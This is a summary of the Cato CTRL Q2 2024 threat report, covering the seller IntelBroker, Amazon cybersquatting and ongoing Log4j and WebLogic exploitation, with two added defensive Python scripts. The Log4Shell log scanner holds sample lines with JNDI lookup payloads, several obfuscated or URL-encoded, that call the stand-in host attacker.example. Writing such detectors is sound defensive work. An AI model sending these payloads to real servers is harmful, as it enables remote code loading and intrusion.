The latest analysis from Cato CTRL reveals alarming developments in the cybersecurity landscape. The threat actor “IntelBroker” emerges as a central figure in selling stolen data and source code, and also plays a prominent role in hacking forums.
The Cato CTRL SASE Threat Report Q2 2024 focuses on three key areas:
- Hacker Communities
- Observations from the Dark Web
- Corporate and Network Security
The results are based on Cato CTRL’s analysis of 1.38 trillion network flows across more than 2,500 Cato customers worldwide between April and June 2024:
IntelBroker emerges as an active threat actor in terms of selling data and source code
In its investigation of hacker communities and the Dark Web, Cato CTRL encountered a threat actor calling themselves IntelBroker, who appears to be a prominent figure not only in selling data and source code but also as a moderator of the hacking forum BreachForums.
In recent months, IntelBroker has offered data and source code from AMD, Apple, Facebook, KrypC, Microsoft, Space-Eyes, T-Mobile, and U.S. Army Aviation and Missile Command for sale.
Amazon is the Most Impersonated Brand – Thanks to Cybersquatting
Cybersquatting involves registering a domain name with the intention of profiting from the registered trademark of a legitimate company. Attackers use such domains to harvest user credentials, for example by spreading malware or phishing.
In the second quarter of 2024, Cato CTRL’s security researchers found that Amazon was by far the most frequently impersonated brand (66% of domains), while Google came in second with only 7%. Given how well-known and popular Amazon is, users should be particularly vigilant.
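A defender monitoring for brand impersonation typically screens newly observed domains (from passive DNS, certificate transparency or proxy logs) against the brands they care about. The following is an added illustration, not Cato CTRL code: it flags the common cybersquatting patterns, namely the brand as a subdomain, the brand embedded in a longer registrable label, digit-for-letter homoglyphs, and one-character typos. The brand list, the homoglyph table and the sample domains are constructed, and the registrable-label extraction is a deliberate simplification that assumes a single-label TLD (no public-suffix list).

```python
"""Flag candidate domains that impersonate a monitored brand.

Added example for this summary, not Cato CTRL code. Brand list, homoglyph
table and sample domains are constructed. Registrable-label extraction is a
simplification (no public-suffix list; assumes a single-label TLD).
"""
from __future__ import annotations

# Brands we monitor (constructed list).
MONITORED_BRANDS = {"amazon", "google"}

# Visually similar substitutions an impersonator might use (constructed table).
HOMOGLYPHS = {"0": "o", "1": "l", "3": "e", "5": "s", "rn": "m", "vv": "w"}


def levenshtein(a: str, b: str) -> int:
    """Edit distance between two strings (classic dynamic programming)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def normalize_homoglyphs(label: str) -> str:
    """Map look-alike characters back to the letters they imitate."""
    for src, dst in HOMOGLYPHS.items():
        label = label.replace(src, dst)
    return label


def split_domain(domain: str) -> tuple[list[str], str]:
    """Return (subdomain labels, registrable label); assumes a single-label TLD."""
    labels = domain.lower().rstrip(".").split(".")
    if len(labels) < 2:
        return [], labels[0]
    return labels[:-2], labels[-2]


def classify(domain: str, brands=MONITORED_BRANDS) -> str | None:
    """Return a reason string if the domain looks like brand impersonation, else None."""
    subs, reg = split_domain(domain)
    if reg in brands:
        return None  # the brand's own registrable label is not an impersonation
    for brand in sorted(brands):
        if brand in subs:            # e.g. amazon.login.example
            return f"brand-as-subdomain:{brand}"
        if brand in reg:             # e.g. amazon-verify, myamazon
            return f"brand-embedded:{brand}"
        norm = normalize_homoglyphs(reg)
        if norm != reg and norm == brand:   # e.g. amaz0n, arnazon
            return f"homoglyph:{brand}"
        if levenshtein(reg, brand) == 1:    # e.g. amazom, goggle
            return f"typosquat:{brand}"
    return None


def scan(domains) -> dict[str, str]:
    """Map each suspicious domain to the reason it was flagged."""
    hits = {}
    for d in domains:
        why = classify(d)
        if why:
            hits[d] = why
    return hits


if __name__ == "__main__":
    # Constructed sample of newly observed domains.
    SAMPLE = ["amazon.com", "amaz0n.com", "amazon-verify.net", "amazon.login.example",
              "amazom.com", "goggle.com", "example.org"]
    for d, why in scan(SAMPLE).items():
        print(f"{d:28s} {why}")
```

In practice the flagged list is a triage queue rather than a verdict: a hit should be enriched with registration date, certificate issuance and whether the site serves a login page before being blocked or reported.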
Log4j and Oracle WebLogic remain popular Zero-Days that continue to be exploited
Three years after its discovery in 2021, Log4j remains one of the most frequently exploited zero-days. From the first to the second quarter of 2024, Cato CTRL observed a 61% increase in attempted exploitation of Log4j in incoming traffic and a 79% increase in WAN-bound traffic.
The Oracle WebLogic vulnerability from 2020 also remains a popular zero-day. From the first to the second quarter of 2024, Cato CTRL observed a 114% increase in attempted exploitation of the Oracle WebLogic vulnerability in WAN-bound traffic.
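The Log4j exploitation attempts the report counts are visible in ordinary web-server logs, because the payload has to arrive in a logged field such as the User-Agent or a query parameter. The following is an added detection example, not code from the Cato CTRL report: it normalises each line (URL decoding, then collapsing the `${lower:x}`, `${upper:x}` and `${...:-x}` lookups attackers use to hide the string) and then checks for a JNDI lookup. The log lines are constructed, the `attacker.example` host is a placeholder, and the obfuscation forms handled are the common ones only; a production rule would sit beside a patched Log4j rather than replace it.

```python
"""Scan web-server access log lines for Log4j (Log4Shell) exploitation attempts.

Added example; not part of the Cato CTRL report. Log lines are constructed and
attacker.example is a placeholder host. Only the common obfuscations are handled.
"""
import re
from urllib.parse import unquote

# ${something:-default} and ${lower:x}/${upper:x} are the usual ways the
# literal "jndi" is hidden; we resolve them to their literal result.
DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.I)
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.I)


def deobfuscate(s: str, rounds: int = 10) -> str:
    """Undo URL encoding and collapse nested lookups, innermost first."""
    for _ in range(3):          # tolerate double or triple URL encoding
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    for _ in range(rounds):     # each pass resolves one nesting level
        new = CASE_LOOKUP.sub(lambda m: m.group(1), s)
        new = DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == s:
            break
        s = new
    return s


def is_log4shell_attempt(line: str) -> bool:
    """True if the line contains a JNDI lookup after normalisation."""
    return JNDI.search(deobfuscate(line)) is not None


def find_attempts(lines) -> list[int]:
    """Return the indices of log lines that look like exploitation attempts."""
    return [i for i, line in enumerate(lines) if is_log4shell_attempt(line)]


# Constructed sample access log (combined log format); not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [02/Jun/2024:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [02/Jun/2024:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [02/Jun/2024:10:01:15 +0000] "GET /?x=${${lower:j}ndi:rmi://attacker.example/b} HTTP/1.1" 400 0 "-" "curl/8.0"',
    '10.0.0.11 - - [02/Jun/2024:10:01:21 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://attacker.example/c}"',
    '10.0.0.13 - - [02/Jun/2024:10:01:30 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fattacker.example%2Fd%7D HTTP/1.1" 200 512 "-" "-"',
    '10.0.0.15 - - [02/Jun/2024:10:01:33 +0000] "GET /?tpl=${date:yyyy} HTTP/1.1" 200 512 "-" "-"',
]

if __name__ == "__main__":
    for i in find_attempts(SAMPLE_LOG):
        print(f"line {i}: {SAMPLE_LOG[i]}")
```

The last sample line shows why the check runs after normalisation rather than on a bare `${`: a harmless `${date:yyyy}` template string is not flagged, while the four obfuscated or encoded variants all reduce to the same `${jndi:` prefix.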
For more results, please refer to the report.
(vp/Cato Networks)